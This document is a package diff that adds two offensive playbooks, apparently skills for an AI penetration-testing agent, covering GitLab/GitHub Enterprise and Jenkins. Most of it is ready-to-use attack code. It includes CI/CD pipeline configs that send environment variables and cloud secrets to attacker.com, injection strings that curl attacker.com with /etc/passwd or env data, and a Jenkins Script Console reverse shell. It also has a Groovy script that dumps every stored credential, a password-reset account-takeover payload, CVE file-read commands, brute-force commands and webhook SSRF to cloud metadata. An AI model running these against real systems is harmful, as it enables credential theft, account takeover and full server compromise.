@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md

@@ -0,0 +1,259 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: gitlab-github
+description: Security testing playbook for GitLab and GitHub Enterprise covering exposed repositories, CI/CD pipeline injection, token extraction, IDOR, and self-hosted instance vulnerabilities
+---
+
+# GitLab / GitHub Enterprise Security Testing
+
+Source code repositories are high-value targets. Attack surface: exposed private repos, hardcoded secrets in code/history, CI/CD pipeline injection (SAST bypass, token theft), IDOR in project access, webhook abuse, and numerous GitLab-specific CVEs.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Common self-hosted GitLab/GitHub paths
+    GET /                           # Landing page — check if private instance
+    GET /explore                    # GitLab: public project browser
+    GET /explore/projects           # Public projects
+    GET /explore/groups             # Public groups
+    GET /users/sign_in              # Login page (reveals version)
+    GET /help                       # GitLab version disclosure
+
+    # GitHub Enterprise:
+    GET /login                      # Enterprise login
+    GET /api/v3/                    # GitHub Enterprise API
+    GET /-/health                   # Health check (GHE)
+
+    # GitLab version fingerprinting:
+    GET /-/manifest.json            # GitLab version in manifest
+    GET /-/health                   # Health endpoint
+    curl <target> | grep -i "gitlab\|version"
+    # Look for: <meta content="GitLab 16.5.0" name="description">
+
+---
+
+## Public Repository Enumeration
+
+    # Enumerate public repos (GitLab):
+    GET /api/v4/projects?visibility=public&per_page=100
+    GET /api/v4/users/<username>/projects
+    GET /explore/projects?sort=latest_activity_desc
+
+    # Search public repos for keywords:
+    GET /search?search=password&scope=blobs         # GitLab code search
+    GET /search?search=api_key&scope=blobs
+    GET /search?search=secret&scope=blobs
+    GET /search?search=BEGIN+RSA+PRIVATE&scope=blobs
+
+    # GitHub Enterprise API:
+    curl https://<ghe-host>/api/v3/repos?type=public&per_page=100 \
+      -H "Authorization: token <token>"
+
+---
+
+## Secret/Token Extraction from Repos
+
+    # Search commit history for secrets (git history mining):
+    git clone <repo_url>
+    git log --all --full-history -p | grep -iE "password|secret|api.?key|token|credential|private.?key"
+
+    # Tools for automated secret scanning:
+    # trufflehog — entropy + regex detection
+    trufflehog git <repo_url> --json
+    trufflehog git file://./local-repo --json
+
+    # gitleaks
+    gitleaks detect --source=./repo --verbose
+
+    # Scan GitLab API for exposed secrets in public code:
+    curl "https://<gitlab>/api/v4/search?scope=blobs&search=password&per_page=100" \
+      -H "PRIVATE-TOKEN: <token>"
+
+    # Check .env files committed accidentally:
+    git log --all -- '*.env' -p
+    git log --all -- '*.pem' -p
+    git log --all -- 'id_rsa' -p
+    git log --all -- 'credentials*' -p
+
+    # GitLab snippet search (public snippets):
+    GET /explore/snippets?sort=latest_activity_desc
+
+---
+
+## CI/CD Pipeline Injection
+
+If you can contribute to a repo or modify pipeline config:
+
+    # GitLab CI — .gitlab-ci.yml injection:
+    stages:
+      - exfil
+    steal_secrets:
+      stage: exfil
+      script:
+        - env | curl -F "data=@-" https://attacker.com/  # Exfil all env vars
+        - cat $CI_REGISTRY_PASSWORD | curl -F "data=@-" https://attacker.com/
+        - echo "$KUBE_CONFIG" | curl -F "data=@-" https://attacker.com/
+
+    # GitHub Actions — .github/workflows injection:
+    name: Exfil
+    on: [push]
+    jobs:
+      steal:
+        runs-on: ubuntu-latest
+        steps:
+          - name: Exfil secrets
+            env:
+              SECRET: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+            run: |
+              curl -F "d=$SECRET" https://attacker.com/
+
+    # Pipeline secret injection via PR (fork-based):
+    # Fork repo → modify workflow → open PR → pipeline runs with repo secrets
+    # Note: GitHub Actions restricts secrets on fork PRs by default (but often misconfigured)
+
+    # Check if workflow uses user-controlled input unsafely:
+    # Vulnerable:
+    - run: echo "${{ github.event.pull_request.title }}"   # Title injection
+    # Attack PR title: `"; curl https://attacker.com/?x=$(env|base64); echo "`
+
+---
+
+## GitLab API Exploitation
+
+    # With token (PRIVATE-TOKEN):
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/user       # Current user
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/projects   # All projects
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/admin/users  # Admin: all users
+
+    # List all users (admin):
+    curl -H "PRIVATE-TOKEN: <admin_token>" https://<gitlab>/api/v4/users?per_page=100
+
+    # Access private repos:
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/projects/<id>/repository/files/<file_path>/raw?ref=main
+
+    # Download entire repo:
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/projects/<id>/repository/archive?sha=main
+
+    # List CI/CD variables (secrets):
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/projects/<id>/variables
+    # Returns: all CI/CD secret variables in plaintext!
+
+    # List environment variables of a pipeline run:
+    curl -H "PRIVATE-TOKEN: <token>" https://<gitlab>/api/v4/projects/<id>/pipelines/<pipeline_id>/jobs
+
+---
+
+## IDOR in GitLab/GitHub
+
+    # GitLab project ID enumeration:
+    GET /api/v4/projects/1          # Check sequential project IDs
+    GET /api/v4/projects/2
+    # Private projects return 404, but may return 401 (exists, no access)
+
+    # User enumeration:
+    GET /api/v4/users/1             # User by ID
+    GET /<username>                 # User profile page
+
+    # Merge request / PR enumeration:
+    GET /api/v4/projects/<id>/merge_requests?state=all
+
+    # Issue access control (may expose private issue content):
+    GET /api/v4/projects/<id>/issues/<issue_id>
+
+---
+
+## GitLab Registration Abuse
+
+    # If registration is open on self-hosted GitLab:
+    # 1. Register account
+    # 2. Access internal projects, wikis, snippets
+    # 3. Internal GitLab may have much weaker access control
+
+    GET /users/sign_up              # Registration page
+    # Register → check /explore for internal projects
+    # Invite yourself to projects via @mention in issues
+
+---
+
+## Common GitLab CVEs
+
+| CVE | GitLab Version | Impact |
+|-----|---------------|--------|
+| CVE-2021-22205 | < 13.10.3 | RCE via image upload (ExifTool) |
+| CVE-2022-2992 | < 15.3.2 | SSRF + RCE via import |
+| CVE-2023-2825 | 16.0.0 | Path traversal → arbitrary file read |
+| CVE-2023-7028 | < 16.5.6 | Account takeover via password reset |
+| CVE-2024-0402 | < 16.5.8 | Arbitrary file write → RCE |
+
+    # CVE-2021-22205 — RCE via ExifTool image upload (no auth required):
+    # Upload a crafted DjVu file to trigger RCE via ExifTool parser
+    # Tools: https://github.com/CsEnox/Gitlab-Exiftool-RCE
+    python3 exploit.py -t https://<gitlab> -u <user> -p <pass>
+
+    # CVE-2023-7028 — Password reset to arbitrary email:
+    POST /users/password
+    {"user": {"email[]": ["victim@target.com", "attacker@evil.com"]}}
+    # Reset token sent to both emails → account takeover
+
+    # Nuclei:
+    nuclei -t cves/ -tags gitlab -u https://<gitlab>
+    nuclei -t cves/ -tags github -u https://<ghe>
+
+---
+
+## GitHub Token Abuse
+
+    # GitHub token formats:
+    # ghp_ = personal access token (classic)
+    # github_pat_ = personal access token (fine-grained)
+    # ghs_ = GitHub Apps token
+    # ghr_ = OAuth refresh token
+
+    # Test token validity:
+    curl -H "Authorization: token ghp_xxx" https://api.github.com/user
+    # Returns user info if valid
+
+    # Enumerate accessible repos:
+    curl -H "Authorization: token ghp_xxx" https://api.github.com/user/repos?per_page=100&type=all
+
+    # Access private repos:
+    curl -H "Authorization: token ghp_xxx" https://api.github.com/repos/<owner>/<repo>/contents/
+
+    # List organization secrets (if token has admin rights):
+    curl -H "Authorization: token ghp_xxx" https://api.github.com/orgs/<org>/actions/secrets
+
+---
+
+## Webhook Exploitation
+
+    # If you can create/modify webhooks:
+    # Set webhook URL to attacker server to receive:
+    # - Push events (code + secrets in commits)
+    # - Pull request events (PR bodies, reviewer lists)
+    # - Pipeline events (build outputs, artifact paths)
+
+    # GitLab webhook SSRF:
+    # Create webhook pointing to internal service:
+    POST /api/v4/projects/<id>/hooks
+    {"url": "http://169.254.169.254/latest/meta-data/", "push_events": true, "token": "test"}
+    # Trigger a push → GitLab makes request to IMDS → response in webhook delivery logs
+
+---
+
+## Pro Tips
+
+1. Search `.gitlab-ci.yml` and `.github/workflows/` for hardcoded secrets and unsafe `${{ }}` expressions
+2. GitLab `/api/v4/projects/<id>/variables` with a token = all CI/CD secrets in plaintext
+3. CVE-2023-7028 (GitLab password reset) works on many unpatched instances — test first
+4. `trufflehog` and `gitleaks` find secrets deleted from HEAD but still in git history
+5. GitLab Runner tokens in `.gitlab-ci.yml` or job logs allow registering malicious runners
+6. Webhook SSRF via GitLab hook delivery is a reliable internal network probe
+7. Public GitLab instances often have `registration allowed` — register and explore internal projects
+
+## Summary
+
+GitLab/GitHub testing = secret scanning in git history (trufflehog/gitleaks) + CI/CD pipeline injection via `.gitlab-ci.yml` / GitHub Actions + GitLab CVE check (CVE-2023-7028 password reset, CVE-2021-22205 RCE) + API token enumeration. Git history contains secrets deleted from HEAD — always scan history. CI/CD pipeline variables are the most common source of cloud credentials in enterprise environments.

package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md

@@ -0,0 +1,256 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: jenkins
+description: Security testing playbook for Jenkins CI/CD covering unauthenticated access, Script Console RCE, Groovy injection, job configuration abuse, credential extraction, and known CVEs
+---
+
+# Jenkins Security Testing
+
+Jenkins is the most common CI/CD server in enterprise environments. Attack surface: unauthenticated Script Console (instant RCE), job configuration injection, credential store extraction, Groovy script execution, and numerous unpatched CVEs.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Port scanning
+    nmap -p 8080,8443,50000 <target> -sV --open
+
+    # Ports:
+    # 8080  — Jenkins HTTP (most common)
+    # 8443  — Jenkins HTTPS
+    # 50000 — Jenkins agent port (JNLP)
+
+    # Jenkins fingerprinting
+    GET http://<target>:8080/
+    # Response: Jenkins login page or dashboard
+    # Header: X-Jenkins: 2.401.3   ← exact version
+
+    GET /login                      # Login page
+    GET /api/json                   # JSON API (reveals version, jobs if unauth)
+    GET /api/json?pretty=true
+    GET /asynchPeople/              # User list
+    GET /people/                    # User enumeration
+
+---
+
+## Unauthenticated Access
+
+    # Test if anonymous access is enabled (no auth required)
+    curl -s http://<target>:8080/api/json?pretty=true
+    # If returns job list → anonymous read access enabled
+
+    curl -s http://<target>:8080/script
+    # If returns Script Console → INSTANT RCE
+
+    # Enumerate all jobs (unauthenticated):
+    curl -s "http://<target>:8080/api/json?tree=jobs[name,url,builds[number,result]]&pretty=true"
+
+    # Get job config (may contain credentials, SCM tokens):
+    curl -s "http://<target>:8080/job/<job-name>/config.xml"
+
+---
+
+## Script Console — Remote Code Execution
+
+Jenkins Script Console executes arbitrary Groovy code. If accessible = instant RCE.
+
+    # Access Script Console:
+    GET /script                     # Web UI Script Console
+    GET /scriptText                 # API version
+
+    # Execute commands via Script Console (Groovy):
+    "id".execute().text
+    "ls /".execute().text
+    "cat /etc/passwd".execute().text
+
+    # More reliable execution:
+    def cmd = ["bash", "-c", "id"].execute()
+    println cmd.text
+
+    # Reverse shell via Script Console:
+    def cmd = ["bash", "-c", "bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1"].execute()
+
+    # Execute via API (no browser needed):
+    curl -X POST "http://<target>:8080/scriptText" \
+      --data 'script=println+"id".execute().text' \
+      --cookie "JSESSIONID=<session>"
+
+    # With credentials:
+    curl -X POST "http://<admin>:<password>@<target>:8080/scriptText" \
+      --data 'script=println+"id".execute().text'
+
+    # Using crumb (CSRF token required for POST):
+    CRUMB=$(curl -s "http://<admin>:<pass>@<target>:8080/crumbIssuer/api/json" | python3 -c "import sys,json; print(json.load(sys.stdin)['crumb'])")
+    curl -X POST "http://<admin>:<pass>@<target>:8080/scriptText" \
+      -H "Jenkins-Crumb: $CRUMB" \
+      --data-urlencode 'script=println "id".execute().text'
+
+---
+
+## Credential Extraction
+
+Jenkins stores credentials in the credential store. With script access, extract all secrets:
+
+    # Extract all credentials via Script Console:
+    import com.cloudbees.plugins.credentials.*
+    import com.cloudbees.plugins.credentials.common.*
+    import com.cloudbees.plugins.credentials.domains.*
+    import com.cloudbees.plugins.credentials.impl.*
+    import com.cloudbees.jenkins.plugins.sshcredentials.impl.*
+    import org.jenkinsci.plugins.plaincredentials.*
+
+    def credentials = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
+        com.cloudbees.plugins.credentials.Credentials.class,
+        jenkins.model.Jenkins.instance, null, null
+    )
+
+    for (c in credentials) {
+        if (c instanceof UsernamePasswordCredentialsImpl) {
+            println "Username: ${c.username}, Password: ${c.password.plainText}"
+        } else if (c instanceof StringCredentialsImpl) {
+            println "Secret: ${c.secret.plainText}"
+        } else if (c instanceof BasicSSHUserPrivateKey) {
+            println "SSH Key: ${c.privateKey}"
+        }
+    }
+
+    # Extract Jenkins master key and encrypted secrets:
+    println new File('/var/jenkins_home/secrets/master.key').text
+    println new File('/var/jenkins_home/credentials.xml').text
+
+---
+
+## Job Configuration Abuse
+
+    # Trigger a build with custom parameters (if build permission granted):
+    curl -X POST "http://<target>:8080/job/<job-name>/build" \
+      --data "json={\"parameter\": [{\"name\":\"PARAM\", \"value\":\"value\"}]}"
+
+    # If job has "Execute shell" build step — inject into parameters:
+    # Parameter default: `ls -la`
+    # Attack: `ls -la; curl attacker.com/$(cat /etc/passwd | base64)`
+
+    # Read job workspace (may contain secrets, built artifacts):
+    GET /job/<job-name>/ws/                       # Job workspace file browser
+    GET /job/<job-name>/ws/.env                   # .env in workspace
+    GET /job/<job-name>/ws/config/secrets.json
+
+    # Enumerate build history (may reveal secrets in console output):
+    GET /job/<job-name>/1/console                 # Build 1 console output
+    GET /job/<job-name>/lastSuccessfulBuild/console
+
+---
+
+## Pipeline / Jenkinsfile Injection
+
+If user controls Jenkinsfile content or pipeline script parameters:
+
+    // Malicious Jenkinsfile:
+    pipeline {
+        agent any
+        stages {
+            stage('Exfil') {
+                steps {
+                    sh 'cat /var/jenkins_home/credentials.xml | curl -F "data=@-" https://attacker.com/'
+                }
+            }
+        }
+    }
+
+    // Inline script injection (if parameter passed to sh step):
+    sh "echo ${params.INPUT}"    // Vulnerable if INPUT is not sanitized
+    // Inject: `; curl attacker.com/$(id|base64);`
+
+---
+
+## Authentication Bypass / Brute Force
+
+    # Default credentials to try:
+    admin:admin
+    admin:password
+    admin:jenkins
+    jenkins:jenkins
+
+    # Brute force login:
+    hydra -l admin -P /usr/share/wordlists/rockyou.txt http-form-post \
+      "http://<target>:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:loginError"
+
+    # Jenkins uses JSESSIONID cookie after login — no rate limiting in old versions
+
+    # API token brute force (if user enumerated):
+    curl -u admin:<token> http://<target>:8080/api/json
+
+---
+
+## Jenkins API Exploitation
+
+    # List all jobs and build status:
+    GET /api/json?tree=jobs[name,url,lastBuild[result,timestamp,url]]&depth=2
+
+    # List all users:
+    GET /asynchPeople/api/json
+
+    # Get user info (token?):
+    GET /user/<username>/api/json
+
+    # List installed plugins (check for vulnerable versions):
+    GET /pluginManager/api/json?depth=1&tree=plugins[shortName,version,active]
+
+    # List node/agent info (may reveal internal hostnames):
+    GET /computer/api/json?depth=1
+
+---
+
+## Sensitive File Locations
+
+    # Jenkins home directory (default: /var/jenkins_home or /var/lib/jenkins)
+    /var/jenkins_home/secrets/master.key          # Master encryption key
+    /var/jenkins_home/secrets/hudson.util.Secret  # Secret key
+    /var/jenkins_home/credentials.xml             # Encrypted credentials
+    /var/jenkins_home/config.xml                  # Main config (users, security matrix)
+    /var/jenkins_home/users/                      # User configs + API tokens
+    /var/jenkins_home/jobs/                       # Job configs + build history
+
+    # Read via Script Console if accessible:
+    println new File('/var/jenkins_home/secrets/master.key').text
+
+---
+
+## Common CVEs
+
+| CVE | Component | Impact |
+|-----|-----------|--------|
+| CVE-2024-23897 | Jenkins CLI | Arbitrary file read (critical) |
+| CVE-2023-27898 | Jenkins | XSS → RCE via update center |
+| CVE-2022-36881 | Git plugin | MITM on SCM checkout |
+| CVE-2019-1003000 | Script Security | Sandbox bypass → RCE |
+| CVE-2018-1000861 | Stapler | Arbitrary code execution |
+| CVE-2017-1000353 | Jenkins | Java deserialization RCE |
+| CVE-2016-0792 | Jenkins | JNLP agent RCE |
+
+    # CVE-2024-23897 — Arbitrary file read via CLI:
+    java -jar jenkins-cli.jar -s http://<target>:8080/ help "@/etc/passwd"
+    java -jar jenkins-cli.jar -s http://<target>:8080/ help "@/var/jenkins_home/secrets/master.key"
+
+    # Nuclei:
+    nuclei -t cves/ -tags jenkins -u http://<target>:8080/
+    nuclei -t exposures/jenkins/ -u http://<target>:8080/
+
+---
+
+## Pro Tips
+
+1. Always check `/script` first — unauthenticated Script Console = instant RCE
+2. `/api/json` without auth = reveals all job names + build history (info disclosure)
+3. Job workspace (`/job/<name>/ws/`) often contains `.env`, keys, certificates
+4. CVE-2024-23897 (file read via CLI) is widely unpatched — always test
+5. Credentials in Jenkins are only encrypted with master.key — if you read both, you have plaintext
+6. `asynchPeople/` lists all users (for brute force targeting) without authentication
+7. Pipeline script injection via unsanitized `sh "${params.INPUT}"` is extremely common
+
+## Summary
+
+Jenkins testing = `/script` for unauthenticated RCE + credential extraction via Groovy + CVE-2024-23897 CLI file read + job workspace sensitive file exposure. Script Console access = complete server compromise — extract master.key + credentials.xml to decrypt all stored secrets. Always enumerate jobs, check workspace files, and test CVE-2024-23897 regardless of version since patching is slow in enterprise Jenkins installations.